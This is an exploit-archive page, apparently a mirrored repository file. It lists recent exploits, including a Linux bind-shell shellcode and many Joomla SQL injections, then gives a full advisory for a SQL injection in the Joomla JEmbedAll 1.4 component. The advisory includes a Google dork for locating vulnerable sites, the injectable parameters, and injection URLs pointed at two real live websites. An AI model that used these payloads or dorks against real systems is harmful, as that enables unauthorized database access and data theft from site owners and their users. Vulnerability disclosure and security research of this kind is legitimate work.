2f2ccec5c2
8 new exploits Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes) Joomla! Component 'com_spidercalendar' - SQL Injection Joomla! Component Spider Calendar - SQL Injection Joomla! Component 'com_spidercatalog' - 'Product_ID' Parameter SQL Injection Joomla! Component Spider Catalog 1.1 - 'Product_ID' Parameter SQL Injection Joomla! Component 'com_spidercalendar' - 'date' Parameter Blind SQL Injection Joomla! Component Spider Calendar - 'date' Parameter Blind SQL Injection Joomla! Component 'com_spidercalendar' 3.2.6 - SQL Injection Joomla! Component Spider Calendar 3.2.6 - SQL Injection Joomla! Component 'com_spidercontacts' 1.3.6 - 'contacts_id' Parameter SQL Injection Joomla! Component Spider Contacts 1.3.6 - 'contacts_id' Parameter SQL Injection Joomla! Component 'com_spiderfaq' - SQL Injection Joomla! Component Spider FAQ - SQL Injection Joomla! Component Spider Calendar Lite 3.2.16 - SQL Injection Joomla! Component Spider Catalog Lite 1.8.10 - SQL Injection Joomla! Component Spider Facebook 1.6.1 - SQL Injection Joomla! Component Spider FAQ Lite 1.3.1 - SQL Injection WordPress Plugin Corner Ad 1.0.7 - Cross-Site Scripting dotCMS 3.6.1 - Blind Boolean SQL Injection Joomla! Component JEmbedAll 1.4 - SQL Injection
25 lines
No EOL
1 KiB
Text
Executable file
25 lines
No EOL
1 KiB
Text
Executable file
# # # # #
|
|
# Exploit Title: Joomla! Component JEmbedAll v1.4 - SQL Injection
|
|
# Google Dork: inurl:index.php?option=com_jembedall
|
|
# Date: 16.02.2017
|
|
# Vendor Homepage: http://www.goldengravel.eu/
|
|
# Software Buy: https://extensions.joomla.org/extensions/extension/core-enhancements/coding-a-scripts-integration/jembedall/
|
|
# Demo: http://www.goldengravel.eu/
|
|
# Version: 1.4
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/index.php?option=com_jembedall&downloadfree=[SQL]
|
|
# http://localhost/[PATH]/index.php?option=com_jembedall&export=articlepdf&id=[SQL]
|
|
# # # # #
|
|
|
|
|
|
http://www.goldengravel.eu/index.php?option=com_jembedall&downloadfree=4'
|
|
http://www.goldengravel.eu/index.php?option=com_jembedall&export=articlepdf&id=4'
|
|
|
|
http://www.supravirtual.ro/index.php?option=com_jembedall&downloadfree=4'
|
|
http://www.supravirtual.ro/index.php?option=com_jembedall&export=articlepdf&id=4' |